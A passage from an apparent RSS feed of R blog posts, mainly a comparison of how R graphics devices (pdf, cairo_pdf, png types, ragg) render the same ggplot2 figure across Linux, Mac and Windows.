&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ragg&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;agg_png&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;, res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; res, units &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;in&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ragg_png&amp;#34;&lt;/span&gt;, fig.ext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Remember the &lt;code&gt;dpi&lt;/code&gt; argument isn’t passed to &lt;code&gt;ragg_png()&lt;/code&gt;, so if you want to change the resolution per chunk, then you will need to use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dev.args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(ragg_png &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;192&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As {ragg} is being developed by RStudio, I’m guessing that at some point in the near future, ragg will become native to {knitr}.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Saving R Graphics across OSs</title><link>https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/</link><pubDate>Tue, 14 Apr 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;R is known for its amazing &lt;a href="https://www.jumpingrivers.com/blog/our-logo-in-r/" rel="external"&gt;graphics&lt;/a&gt;. Not only {ggplot2}, but also {plotly}, and the dozens of other packages at the graphics &lt;a href="https://cran.r-project.org/web/views/Graphics.html" rel="external"&gt;task view&lt;/a&gt;. There seems to be a graph for every scenario. However, once you’ve created your figure, how do you export it? This post compares standard methods for exporting R plots as PNGs/PDFs across different OSs. As R has excellent cross-platform capabilities, we may expect this to follow through to exporting graphics. But as we’ll see, this isn’t the case!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-graphics-cairo-png-pdf-saving"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="saving-graphics"&gt;Saving Graphics&lt;/h2&gt;
&lt;p&gt;Suppose we create a simple {ggplot2} scatter plot&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(mtcars, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(disp, mpg)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But once created, how do you save the plot to a file? If you want to save the scatter plot as a PDF file, then the standard route is something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pdf&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1.pdf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(g)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;pdf()&lt;/code&gt; function is part of the {grDevices} package that comes with base R. When you call &lt;code&gt;pdf()&lt;/code&gt;, R starts a graphics device driver for producing PDF files. The function &lt;code&gt;dev.off()&lt;/code&gt; then closes the file driver.&lt;/p&gt;
&lt;p&gt;The documentation page on the &lt;code&gt;pdf()&lt;/code&gt; function is very detailed - see &lt;code&gt;?pdf&lt;/code&gt;. It highlights the tension between documentation for the developer and documentation for the user. The former cares about details, such as the fact that larger circles use a Bezier curve. But users just want to save a graph. I suspect that the vast majority of people using the &lt;code&gt;pdf()&lt;/code&gt; function don’t really care about the details. They just want a PDF file that contains their plot!&lt;/p&gt;
&lt;p&gt;There are other functions for creating PDF graphics. You could use &lt;code&gt;Cairo::CairoPDF()&lt;/code&gt; or &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt;. As you might gather, both of these functions use &lt;a href="https://www.cairographics.org/" rel="external"&gt;cairo&lt;/a&gt; graphics. Cairo is a 2D graphics library with support for multiple output devices. These R functions use the Cairo API. What’s not clear from the documentation is how the functions differ (but we’ll see differences later).&lt;/p&gt;
&lt;p&gt;You can determine if you have Cairo capabilities via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;capabilities&lt;/span&gt;()[&lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; cairo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Most standard systems have Cairo support. Part of the difficulty I found when writing this post is that graphics support in R has changed over the years. So it’s very easy to find blog posts that contain outdated information, especially around Cairo.&lt;/p&gt;
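&lt;p&gt;If a script has to run on machines where Cairo may be missing, the capability check can guard the choice of device. The following is a minimal sketch; &lt;code&gt;save_pdf()&lt;/code&gt; is a hypothetical helper written for this illustration, not a function from any package.&lt;/p&gt;

```r
# Sketch: prefer the Cairo PDF device, fall back to pdf() if unavailable.
# `save_pdf` is a hypothetical helper, not part of any package.
save_pdf = function(plot_fn, file) {
  if (isTRUE(unname(capabilities("cairo")))) {
    grDevices::cairo_pdf(file)
  } else {
    grDevices::pdf(file)
  }
  # Close the device when the function exits, even if plotting fails
  on.exit(grDevices::dev.off())
  plot_fn()
  invisible(file)
}

# Usage: pass a function that draws the plot
out = save_pdf(function() plot(1:10), tempfile(fileext = ".pdf"))
file.exists(out)
```

&lt;p&gt;For a {ggplot2} object &lt;code&gt;g&lt;/code&gt;, the drawing function would be &lt;code&gt;function() print(g)&lt;/code&gt;.&lt;/p&gt;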
&lt;p&gt;A similar situation applies to PNG graphics. You can use the default graphics device&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;png&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;figure1.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(g)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dev.off&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;or you could specify the type via &lt;code&gt;png(..., type = &amp;quot;cairo&amp;quot;)&lt;/code&gt; or &lt;code&gt;png(..., type = &amp;quot;cairo-png&amp;quot;)&lt;/code&gt;. There’s also a relatively new package, {ragg} that can save graphics as PNGs.&lt;/p&gt;
&lt;p&gt;Intuitively, these functions must produce different outputs - otherwise why have them? But what is the difference? Is it file size? Speed of creating graphics? Or something else?&lt;/p&gt;
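&lt;p&gt;One quick way to start exploring the question is to write the same plot with each &lt;code&gt;type&lt;/code&gt; and compare the resulting files. The sketch below uses a base plot and assumes that &lt;code&gt;capabilities(&amp;quot;cairo&amp;quot;)&lt;/code&gt; is &lt;code&gt;TRUE&lt;/code&gt; on the machine; it is not the script used for the tests in this post.&lt;/p&gt;

```r
# Sketch: write the same base plot with two png() types and compare sizes.
# Assumes capabilities("cairo") is TRUE on this machine.
types = c("cairo", "cairo-png")
sizes = vapply(types, function(type) {
  file = tempfile(fileext = ".png")
  png(file, type = type)
  plot(1:10)
  dev.off()
  file.size(file)  # size in bytes
}, numeric(1))
sizes
```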
&lt;h2 id="cross-platform"&gt;Cross Platform&lt;/h2&gt;
&lt;p&gt;One of R’s outstanding features is that it is cross platform. You write R code and it magically works under Linux, Windows and Mac. Indeed, the above code “runs” under all three operating systems. But does it produce the same graphic under each platform? Spoiler! None of the above functions produce identical output across OSs. So for “same”, I’m going to take a lax view: I just want figures that look the same.&lt;/p&gt;
&lt;h2 id="cannoical-graphic"&gt;Canonical Graphic&lt;/h2&gt;
&lt;p&gt;To create a test graphic, we first make some data&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set.seed&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then create a graphic that has a few challenging aspects&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(df, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Anti-aliasing check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_abline&lt;/span&gt;(intercept &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, slope &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Font check &amp;amp; newline&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_label&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;This is italic text\n in Arial Narrow&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arial Narrow&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fontface &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;italic&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, label.size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Font check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_bw&lt;/span&gt;(base_family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Times&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Font check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(axis.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;italic&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;( face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;italic&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.caption &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plain&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Transparency&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="2020-r-graphics-ggplot2.png" style="width:400px; class:image-center"&gt;
&lt;p&gt;Many of the aspects of this test graphic have been taken from other blog posts. I’ve provided links at the end of this post.&lt;/p&gt;
&lt;h2 id="the-challenge"&gt;The Challenge&lt;/h2&gt;
&lt;p&gt;The above graphic was created under all three operating systems, using the graphics drivers listed above. The complete script can be downloaded from this &lt;a href="https://gist.github.com/csgillespie/eaa334e7455d3bb2fe967f5dc8614853" rel="external"&gt;GitHub gist&lt;/a&gt;. In this post, I don’t care about file size or the speed of the graphics device. As most use cases for R graphics don’t really depend on a few KB or an extra second generating the graph, this seems a reasonable compromise for this test. All tests were performed using R 3.6.3 or R 3.6.2.&lt;/p&gt;
&lt;h3 id="grdevicespdf"&gt;grDevices::pdf()&lt;/h3&gt;
&lt;p&gt;All plots failed due to fonts. Interestingly, the PDF version was 1.4, compared to 1.5 under other methods. Careful reading of the &lt;code&gt;pdf()&lt;/code&gt; help page suggests this is expected behaviour due to non-standard fonts. From the documentation, I’m pretty sure I could embed the necessary fonts in the PDF file. However, it seems clear that there are differences between OSs, so my fix under Linux might not be cross-platform. Also, if we change font, the issue would appear again.&lt;/p&gt;
&lt;h3 id="cairocairopdf"&gt;Cairo::CairoPDF()&lt;/h3&gt;
&lt;p&gt;Under all OSs, this function call executed without giving an error. However, there are severe font issues. The &lt;code&gt;x&lt;/code&gt; on each plot is different and the text from &lt;code&gt;geom_label()&lt;/code&gt; is different. On Macs, it isn’t even in italics.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-CarioPDF.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;When we compare these graphics to the output from &lt;code&gt;cairo_pdf()&lt;/code&gt; and the different png functions, it appears that the output from &lt;code&gt;CairoPDF()&lt;/code&gt; is incorrect across all OSs.&lt;/p&gt;
&lt;p&gt;Also, using the &lt;code&gt;pdfinfo&lt;/code&gt; tool in Linux, each figure was created using a different version of Cairo: Windows (v1.10.2), Mac (v1.14.6) and Linux (v1.15.0).&lt;/p&gt;
&lt;h3 id="grdevicescairo_pdf"&gt;grDevices::cairo_pdf()&lt;/h3&gt;
&lt;p&gt;All generated PDFs look the same, but are not identical! They again use different versions of Cairo (ranging from v1.14.6 to v1.16.0) and so have different file sizes.&lt;/p&gt;
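&lt;p&gt;Whether two exported files are byte-for-byte identical, rather than just visually similar, can be checked by comparing checksums. A minimal sketch using &lt;code&gt;tools::md5sum()&lt;/code&gt;; the helper &lt;code&gt;files_identical()&lt;/code&gt; is hypothetical and the two files here are placeholders for figures exported on different machines.&lt;/p&gt;

```r
# Sketch: byte-level comparison of two exported figures.
# `files_identical` is a hypothetical helper, not part of any package.
files_identical = function(file_a, file_b) {
  hashes = tools::md5sum(c(file_a, file_b))
  unname(hashes[1] == hashes[2])
}

# Usage with two placeholder files that have the same contents
file_a = tempfile()
file_b = tempfile()
writeLines("same contents", file_a)
writeLines("same contents", file_b)
same = files_identical(file_a, file_b)
```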
&lt;p&gt;If we compare &lt;code&gt;Cairo::CairoPDF()&lt;/code&gt; to &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt; under Windows, we can see the graphics created are significantly different.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-CairoPDF-cairo_pdf-win.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Overall, if you are generating PDF files then it’s clear you should use &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt; if you want any chance of your code working across different OSs.&lt;/p&gt;
&lt;h3 id="grdevicespng"&gt;grDevices::png()&lt;/h3&gt;
&lt;p&gt;The png function produces graphics under Linux and Mac. However, the placement of the text is slightly different, e.g. a few pixels. Under Windows, the font appears to be the default and not Times or Arial.&lt;/p&gt;
&lt;p&gt;Using the &lt;code&gt;pnginfo&lt;/code&gt; tool also highlights that the three PNGs differ by&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Colour Type: Linux: paletted (256 colours) vs Mac: RGB vs Windows: paletted (156 colours)&lt;/li&gt;
&lt;li&gt;Channels: 1 vs 4 vs 1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Also under Windows, the graphic doesn’t use anti-aliasing. This is a technique for smoothing over pixels on straight lines. If we zoom into the line on Linux/Mac vs Windows we can see the “stair-case” effect.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-anti-aliasing.png" style="width:500px; class:image-center"&gt;
&lt;h3 id="grdevicespng-type--cairo"&gt;grDevices::png(…, type = “cairo”)&lt;/h3&gt;
&lt;p&gt;All OSs produce a graphic that looks similar. Placement of text still differs by a few pixels between the OSs, but it’s barely visible. The axis lines look lighter under Mac and &lt;code&gt;pnginfo&lt;/code&gt; indicates that colour type and channels differ.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-cairo-comparison.png" style="width:450px; class:image-center"&gt;
&lt;h3 id="grdevicespng-type--cairo_png"&gt;grDevices::png(…, type = “cairo-png”)&lt;/h3&gt;
&lt;p&gt;All OSs produce a graphic that looks similar and text placement appears (to the naked eye) to be identical. Using &lt;code&gt;pnginfo&lt;/code&gt; indicates that colour type and channels are now the same.&lt;/p&gt;
&lt;h3 id="the-ragg-package"&gt;The {ragg} package&lt;/h3&gt;
&lt;p&gt;Linux, Mac &amp;amp; Windows produced a graphic that looked similar and &lt;code&gt;pnginfo&lt;/code&gt; indicates that all attributes were identical. However the linebreak in &lt;code&gt;geom_label()&lt;/code&gt; uncovered a &lt;a href="https://github.com/r-lib/ragg/issues/32" rel="external"&gt;bug&lt;/a&gt; in the {ragg} package, which was fixed a few days later.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Overall, it appears that getting graphics to be identical across different OSs is more difficult than one would first assume! For PDF plots, the least worst option is &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt;. This doesn’t produce identical graphics, as there are different versions of Cairo in play, but this test indicates the graphics are very similar. Frustratingly, you would typically save your bar/line/scatter plot as a PDF due to the superior resolution. But it also appears this isn’t particularly well suited to being cross-platform.&lt;/p&gt;
&lt;p&gt;For PNG graphics, it’s clear you should always use &lt;code&gt;type = &amp;quot;cairo-png&amp;quot;&lt;/code&gt; with the &lt;code&gt;png()&lt;/code&gt; function. However, I will be moving to the {ragg} package in the near future, especially as &lt;a href="https://github.com/rstudio/rstudio/pull/6539" rel="external"&gt;RStudio&lt;/a&gt; are incorporating it into their IDE. The &lt;a href="https://ragg.r-lib.org/articles/ragg_quality.html" rel="external"&gt;quality&lt;/a&gt; and &lt;a href="https://ragg.r-lib.org/articles/ragg_performance.html" rel="external"&gt;performance&lt;/a&gt; are impressive, and its goal is to produce identical cross-platform graphics.&lt;/p&gt;
&lt;p&gt;See our latest blog post on setting &lt;a href="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/" rel="external"&gt;graphics devices&lt;/a&gt; inside an Rmarkdown document, for details on how to use cairo within knitr.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="links-and-thanks"&gt;Links and thanks&lt;/h2&gt;
&lt;p&gt;This post used bits and pieces from a wide variety of sources. Hopefully, I’ve not forgotten anyone.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This post actually started with an e-conversation with Bob Rudis four years ago, which resulted in &lt;a href="https://github.com/hrbrmstr/r_device_tests" rel="external"&gt;this&lt;/a&gt; initial test.&lt;/li&gt;
&lt;li&gt;This &lt;a href="https://www.andrewheiss.com/blog/2017/09/27/working-with-r-cairo-graphics-custom-fonts-and-ggplot/" rel="external"&gt;post&lt;/a&gt; made me think about Cairo graphics.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://gforge.se/2013/02/exporting-nice-plots-in-r/" rel="external"&gt;Another&lt;/a&gt; post on Cairo, with a look at anti-aliasing issues.&lt;/li&gt;
&lt;li&gt;Thanks to &lt;a href="https://www.flaticon.com/authors/pixel-perfect" rel="external"&gt;flaticon&lt;/a&gt; for nice OS images.&lt;/li&gt;
&lt;li&gt;A big thank you to &lt;a href="https://www.maynoothuniversity.ie/people/catherine-hurley" rel="external"&gt;Catherine Hurley&lt;/a&gt; for running the Mac tests.&lt;/li&gt;
&lt;li&gt;I don’t think I used this &lt;a href="http://zevross.com/blog/2017/06/19/tips-and-tricks-for-working-with-images-and-figures-in-r-markdown-documents/" rel="external"&gt;post&lt;/a&gt;, but I certainly read it. The post provides an excellent description for working with images and figures.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/"&gt;original post&lt;/a&gt;
